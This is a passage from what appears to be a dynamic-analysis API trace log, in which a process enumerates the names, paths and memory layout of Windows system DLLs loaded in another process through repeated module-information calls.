nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0064.509] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdc80000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0064.512] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd980000, lpmodinfo=0x255c7f0, cb=0x18 | out: lpmodinfo=0x255c7f0*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0064.515] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd980000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0064.519] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd980000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0064.522] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd830000, lpmodinfo=0x255e9b0, cb=0x18 | out: lpmodinfo=0x255e9b0*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0064.525] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0064.529] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0064.532] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x2560b80, cb=0x18 | out: lpmodinfo=0x2560b80*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0064.536] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0064.539] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0064.543] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x2562d40, cb=0x18 | out: lpmodinfo=0x2562d40*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0064.546] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0064.550] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0064.553] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefab40000, lpmodinfo=0x2564f00, cb=0x18 | out: lpmodinfo=0x2564f00*(lpBaseOfDll=0x7fefab40000, SizeOfImage=0x56000, EntryPoint=0x7fefab41040)) returned 1 [0064.557] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefab40000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="FVEAPI.dll") returned 0xa [0064.561] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefab40000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FVEAPI.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")) returned 0x1e [0064.564] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefab30000, lpmodinfo=0x25670c0, cb=0x18 | out: lpmodinfo=0x25670c0*(lpBaseOfDll=0x7fefab30000, SizeOfImage=0x9000, EntryPoint=0x7fefab31020)) returned 1 [0064.568] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefab30000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="tbs.dll") returned 0x7 [0064.579] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefab30000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")) returned 0x1b [0064.582] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefab20000, lpmodinfo=0x2569270, cb=0x18 | out: lpmodinfo=0x2569270*(lpBaseOfDll=0x7fefab20000, SizeOfImage=0x9000, EntryPoint=0x7fefab23668)) returned 1 [0064.586] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefab20000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="FVECERTS.dll") returned 0xc [0064.590] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefab20000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FVECERTS.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")) returned 0x20 [0064.594] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9d0000, lpmodinfo=0x256b440, cb=0x18 | out: lpmodinfo=0x256b440*(lpBaseOfDll=0x7fefb9d0000, SizeOfImage=0x16000, EntryPoint=0x7fefb9d11a0)) returned 1 [0064.597] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9d0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="NETAPI32.dll") returned 0xc [0064.601] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9d0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NETAPI32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0064.605] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9c0000, lpmodinfo=0x256d610, cb=0x18 | out: lpmodinfo=0x256d610*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0064.609] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0064.613] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0064.618] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd570000, lpmodinfo=0x256f7e0, cb=0x18 | out: lpmodinfo=0x256f7e0*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0064.623] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd570000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0064.627] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd570000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0064.631] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9a0000, lpmodinfo=0x25719a0, cb=0x18 | out: lpmodinfo=0x25719a0*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0064.636] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0064.641] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0064.645] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce60000, lpmodinfo=0x2573b60, cb=0x18 | out: lpmodinfo=0x2573b60*(lpBaseOfDll=0x7fefce60000, SizeOfImage=0x30000, EntryPoint=0x7fefce6194c)) returned 1 [0064.649] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce60000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="LOGONCLI.DLL") returned 0xc [0064.653] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce60000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LOGONCLI.DLL" (normalized: "c:\\windows\\system32\\logoncli.dll")) returned 0x20 [0064.657] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefab10000, lpmodinfo=0x2575d30, cb=0x18 | out: lpmodinfo=0x2575d30*(lpBaseOfDll=0x7fefab10000, SizeOfImage=0xf000, EntryPoint=0x7fefab17e80)) returned 1 [0064.661] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefab10000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wiarpc.dll") returned 0xa [0064.665] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefab10000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")) returned 0x1e [0064.670] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa9f0000, lpmodinfo=0x2577ef0, cb=0x18 | out: lpmodinfo=0x2577ef0*(lpBaseOfDll=0x7fefa9f0000, SizeOfImage=0x112000, EntryPoint=0x7fefaa0f354)) returned 1 [0064.675] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa9f0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="schedsvc.dll") returned 0xc [0064.681] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa9f0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")) returned 0x20 [0064.686] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc80000, lpmodinfo=0x257a0d8, cb=0x18 | out: lpmodinfo=0x257a0d8*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0064.693] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc80000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="pcwum.dll") returned 0x9 [0064.699] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc80000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0064.704] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefe070000, lpmodinfo=0x257c298, cb=0x18 | out: lpmodinfo=0x257c298*(lpBaseOfDll=0x7fefe070000, SizeOfImage=0xd88000, EntryPoint=0x7fefe0ecebc)) returned 1 [0064.709] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefe070000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SHELL32.dll") returned 0xb [0064.713] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefe070000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0064.717] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd2a0000, lpmodinfo=0x257e870, cb=0x18 | out: lpmodinfo=0x257e870*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0064.721] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0064.725] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0064.730] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd260000, lpmodinfo=0x2580a30, cb=0x18 | out: lpmodinfo=0x2580a30*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0064.734] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd260000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0064.739] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd260000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0064.743] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc30000, lpmodinfo=0x2582bf0, cb=0x18 | out: lpmodinfo=0x2582bf0*(lpBaseOfDll=0x7fefcc30000, SizeOfImage=0x39000, EntryPoint=0x7fefcc3c0f0)) returned 1 [0064.747] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc30000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="UBPM.dll") returned 0x8 [0064.752] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc30000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\UBPM.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")) returned 0x1c [0064.756] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa9e0000, lpmodinfo=0x2584db0, cb=0x18 | out: lpmodinfo=0x2584db0*(lpBaseOfDll=0x7fefa9e0000, SizeOfImage=0xa000, EntryPoint=0x7fefa9e260c)) returned 1 [0064.761] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa9e0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ktmw32.dll") returned 0xa [0064.765] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa9e0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0064.770] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbc60000, lpmodinfo=0x2586f70, cb=0x18 | out: lpmodinfo=0x2586f70*(lpBaseOfDll=0x7fefbc60000, SizeOfImage=0x35000, EntryPoint=0x7fefbc61064)) returned 1 [0064.774] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbc60000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="XmlLite.dll") returned 0xb [0064.778] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbc60000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\XmlLite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")) returned 0x1f [0064.783] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x2589130, cb=0x18 | out: lpmodinfo=0x2589130*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0064.787] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0064.793] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0064.798] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa960000, lpmodinfo=0x258b2f0, cb=0x18 | out: lpmodinfo=0x258b2f0*(lpBaseOfDll=0x7fefa960000, SizeOfImage=0x77000, EntryPoint=0x7fefa96afd0)) returned 1 [0064.802] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa960000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="taskcomp.dll") returned 0xc [0064.807] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa960000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")) returned 0x20 [0064.811] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x258d4c0, cb=0x18 | out: lpmodinfo=0x258d4c0*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0064.816] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0064.821] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0064.826] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x258f680, cb=0x18 | out: lpmodinfo=0x258f680*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0064.830] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0064.835] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0064.840] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x2591840, cb=0x18 | out: lpmodinfo=0x2591840*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0064.845] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0064.850] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0064.855] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x2593a28, cb=0x18 | out: lpmodinfo=0x2593a28*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0064.864] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.864] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0064.869] CoTaskMemFree (pv=0xd91f20) [0064.869] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.869] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0064.874] CoTaskMemFree (pv=0xd91f20) [0064.874] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd180000, lpmodinfo=0x23c7328, cb=0x18 | out: lpmodinfo=0x23c7328*(lpBaseOfDll=0x7fefd180000, SizeOfImage=0x32000, EntryPoint=0x7fefd18144c)) returned 1 [0064.879] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.879] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd180000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="netjoin.dll") returned 0xb [0064.885] CoTaskMemFree (pv=0xd91f20) [0064.885] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.885] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd180000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")) returned 0x1f [0064.890] CoTaskMemFree (pv=0xd91f20) [0064.890] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc2b0000, lpmodinfo=0x23c94e8, cb=0x18 | out: lpmodinfo=0x23c94e8*(lpBaseOfDll=0x7fefc2b0000, SizeOfImage=0x1f4000, EntryPoint=0x7fefc43c924)) returned 1 [0064.895] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.895] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc2b0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0064.900] CoTaskMemFree (pv=0xd91f20) [0064.900] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.900] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc2b0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")) returned 0x7c [0064.905] CoTaskMemFree (pv=0xd91f20) [0064.905] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc130000, lpmodinfo=0x23cb770, cb=0x18 | out: lpmodinfo=0x23cb770*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0064.910] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.910] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc130000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0064.916] CoTaskMemFree (pv=0xd91f20) [0064.916] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.916] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc130000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0064.921] CoTaskMemFree (pv=0xd91f20) [0064.921] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa730000, lpmodinfo=0x23cd930, cb=0x18 | out: lpmodinfo=0x23cd930*(lpBaseOfDll=0x7fefa730000, SizeOfImage=0x9000, EntryPoint=0x7fefa7311a0)) returned 1 [0064.926] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.927] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa730000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="tschannel.dll") returned 0xd [0064.932] CoTaskMemFree (pv=0xd91f20) [0064.932] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.932] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa730000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\tschannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")) returned 0x21 [0064.937] CoTaskMemFree (pv=0xd91f20) [0064.937] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9ea0000, lpmodinfo=0x23cfb00, cb=0x18 | out: lpmodinfo=0x23cfb00*(lpBaseOfDll=0x7fef9ea0000, SizeOfImage=0x3a000, EntryPoint=0x7fef9ebd020)) returned 1 [0064.942] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.942] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9ea0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wmisvc.dll") returned 0xa [0064.948] CoTaskMemFree (pv=0xd91f20) [0064.949] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.949] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9ea0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wbem\\wmisvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")) returned 0x23 [0064.954] CoTaskMemFree (pv=0xd91f20) [0064.954] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9e20000, lpmodinfo=0x23d1cc8, cb=0x18 | out: lpmodinfo=0x23d1cc8*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0064.960] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.960] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9e20000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0064.966] CoTaskMemFree (pv=0xd91f20) [0064.966] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.966] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9e20000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0064.971] CoTaskMemFree (pv=0xd91f20) [0064.971] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1e0000, lpmodinfo=0x23d3e98, cb=0x18 | out: lpmodinfo=0x23d3e98*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0064.978] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.978] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0064.983] CoTaskMemFree (pv=0xd91f20) [0064.983] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.983] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0064.989] CoTaskMemFree (pv=0xd91f20) [0064.989] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9d80000, lpmodinfo=0x23d6058, cb=0x18 | out: lpmodinfo=0x23d6058*(lpBaseOfDll=0x7fef9d80000, SizeOfImage=0x92000, EntryPoint=0x7fef9df51ec)) returned 1 [0064.995] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.995] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9d80000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="iphlpsvc.dll") returned 0xc [0065.000] CoTaskMemFree (pv=0xd91f20) [0065.000] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.001] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9d80000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")) returned 0x20 [0065.010] CoTaskMemFree (pv=0xd91f20) [0065.010] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb260000, lpmodinfo=0x23d8228, cb=0x18 | out: lpmodinfo=0x23d8228*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0065.016] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.016] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb260000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0065.021] CoTaskMemFree (pv=0xd91f20) [0065.021] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.021] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb260000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0065.031] CoTaskMemFree (pv=0xd91f20) [0065.031] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc950000, lpmodinfo=0x23da3e8, cb=0x18 | out: lpmodinfo=0x23da3e8*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0065.038] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.038] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc950000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0065.046] CoTaskMemFree (pv=0xd91f20) [0065.046] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.046] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc950000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0065.054] CoTaskMemFree (pv=0xd91f20) [0065.054] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb270000, lpmodinfo=0x23dc5b8, cb=0x18 | out: lpmodinfo=0x23dc5b8*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0065.061] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.061] GetModuleBaseNameW (in: 